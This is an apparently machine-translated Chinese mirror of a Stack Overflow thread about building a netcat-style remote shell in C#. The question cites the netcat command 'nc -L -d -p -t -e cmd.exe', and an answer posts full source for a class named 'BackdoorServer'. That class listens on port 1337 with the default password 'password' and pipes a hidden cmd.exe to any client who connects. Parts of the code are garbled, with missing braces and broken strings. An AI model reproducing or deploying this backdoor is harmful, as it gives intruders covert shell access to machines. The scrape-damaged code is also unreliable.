English 中文(简体)
写入像 Netcat 这样的远程 shell 功能的程序
原标题:Writing a program with remote shell functionality like netcat
  • 时间:2012-05-25 15:39:55
  •  标签:
  • c#
  • shell

我有兴趣写入一个程序, 它可以做一些类似 Netcats "nc -L -d -p -t -e cmd.exe" 命令。 因此它提供了一个远程外壳 。 我尝试了从 cmd. exe 发送和接收输出和输入到 cmd. exe 上, 并发送和接收它, 但是它似乎不太有效 。 是否有其他方法可以做? 顺便说一下, 我在 C # 中编程 。

这是我写来测试我是否能做自己的“贝壳”的测试代码。 它的输出是应该通过套接字发送的。 但是, 当读取输出的时间到了, 程序会停止。 这只能通过使用. readline () 方法来纠正, 但我不知道如何检测它何时不再读行 。

        Process p = new Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardInput = true;
        StreamReader sr = p.StandardOutput;
        StreamWriter sw = p.StandardInput;

        while (true)
            Console.Write(">> ");
            string cmd = Console.ReadLine();
            var resp = sr.ReadLine(); 



不知道你是否还在乎这个 但这样对你可能有用

这是C# 远程壳壳牌

*  Created By DT
* ***************************************************************/

using System;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using System.IO;

namespace BackdoorServer
public class Backdoor
    private TcpListener listener;                       //ServerSocket object for listening
    private Socket mainSocket;                          //Socket to handle client-server communication
    private int port;                                   //Port the server listens on
    private String name;                                //The server name
    private String password;                            //The server password
    private bool verbose = true;                        //Displays messages in console if True
    private Process shell;                              //The shell process
    private StreamReader fromShell;
    private StreamWriter toShell;
    private StreamReader inStream;
    private StreamWriter outStream;
    private Thread shellThread;                         //So we can destroy the Thread when the client disconnects

    private static int DEFAULT_PORT = 1337;             //Default port to listen on if one isn t declared
    private static String DEFAULT_NAME = "Server";      //Default name of server if one isn t declared
    private static String DEFAULT_PASS = "password";    //Default server password if one isn t declared

    public Backdoor()
    {                                   //Use default settings
        port = DEFAULT_PORT;
        name = DEFAULT_NAME;
        password = DEFAULT_PASS;

    public Backdoor(int p)
    {                           //Define port only
        port = p;
        name = DEFAULT_NAME;
        password = DEFAULT_PASS;

    public Backdoor(int p, String n)
    {                   //Define port and server name
        port = p;
        name = n;
        password = DEFAULT_PASS;

    public Backdoor(int p, String n, String pass)
    {       //Define port, server name, and password
        port = p;
        name = n;
        password = pass;
    public Backdoor(int p, String n, String pass, bool verb)
    {       //Define port, server name, and password
        port = p;
        name = n;
        password = pass;
        verbose = verb;
    //the startServer method waits for a connection, checks the password,
    //and either drops the client or starts a remote shell
    public void startServer() {
        try {
                Console.WriteLine("Listening on port " + port);

                                                                //Create the ServerSocket
            listener = new TcpListener(port);
            listener.Start();                                   //Stop and wait for a connection
            mainSocket = listener.AcceptSocket();

                Console.WriteLine("Client connected: " + mainSocket.RemoteEndPoint);

            Stream s = new NetworkStream(mainSocket);
            inStream = new StreamReader(s);
            outStream = new StreamWriter(s);
            outStream.AutoFlush = true;

            String checkPass = inStream.ReadLine();

                Console.WriteLine("Client tried password " + checkPass);

            if(!checkPass.Equals(password)) {                       //if the password is not correct
                    Console.WriteLine("Incorrect Password");
                badPass();                                          //Drop the client

                Console.WriteLine("Password Accepted.");

            shell = new Process();
            ProcessStartInfo p = new ProcessStartInfo("cmd");
            p.CreateNoWindow = true;
            p.UseShellExecute = false;
            p.RedirectStandardError = true;
            p.RedirectStandardInput = true;
            p.RedirectStandardOutput = true;
            shell.StartInfo = p;
            toShell = shell.StandardInput;
            fromShell = shell.StandardOutput;
            toShell.AutoFlush = true;
            shellThread = new Thread(new ThreadStart(getShellInput));   //Start a thread to read output from the shell
            outStream.WriteLine("Welcome to " + name + " backdoor server.");        //Display a welcome message to the client
            outStream.WriteLine("Starting shell...
            getInput();                                                 //Prepare to monitor client input...
            dropConnection();                                   //When getInput() is terminated the program will come back here

        catch(Exception) { dropConnection(); }
    //The run method handles shell output in a seperate thread

    void getShellInput()
            String tempBuf = "";
            while ((tempBuf = fromShell.ReadLine()) != null)
                outStream.WriteLine(tempBuf + "
        catch (Exception) { /*dropConnection();*/ }

    private void getInput() {
        try {
            String tempBuff = "";                                       //Prepare a string to hold client commands
            while(((tempBuff = inStream.ReadLine()) != null)) {         //While the buffer is not null
                    Console.WriteLine("Received command: " + tempBuff);
                handleCommand(tempBuff);                                //Handle the client s commands
        catch(Exception) {}

    private void handleCommand(String com) {        //Here we can catch commands before they are sent
        try {                                       //to the shell, so we could write our own if we want
            if(com.Equals("exit")) {                //In this case I catch the  exit  command and use it

Closing the shell and Dropping the connection...");
                dropConnection();                   //to drop the connection
            toShell.WriteLine(com + "
        catch(Exception) { dropConnection(); }

    //The drop connection method closes all connections and
    //resets the objects to their null states to be created again
    //I don t know if this is the best way to do it but it seems to
    //work without issue.
    private void badPass()
    private void dropConnection() {
        try {
                Console.WriteLine("Dropping Connection");
            shellThread = null;
            inStream.Dispose();                                 //Close everything...
        catch(Exception) {}
    static void Main(string[] args)
        try {
            Backdoor bd = new Backdoor();
            if (args.Length == 1)
                bd = new Backdoor(int.Parse(args[0]));
            if (args.Length == 2)
                bd = new Backdoor(int.Parse(args[0]), args[1]);
            if (args.Length == 3)
                bd = new Backdoor(int.Parse(args[0]), args[1], args[2]);
            else if (args.Length == 4)
                bd = new Backdoor(int.Parse(args[0]), args[1], args[2], bool.Parse(args[3]));
            while (true)
        catch(Exception) {}


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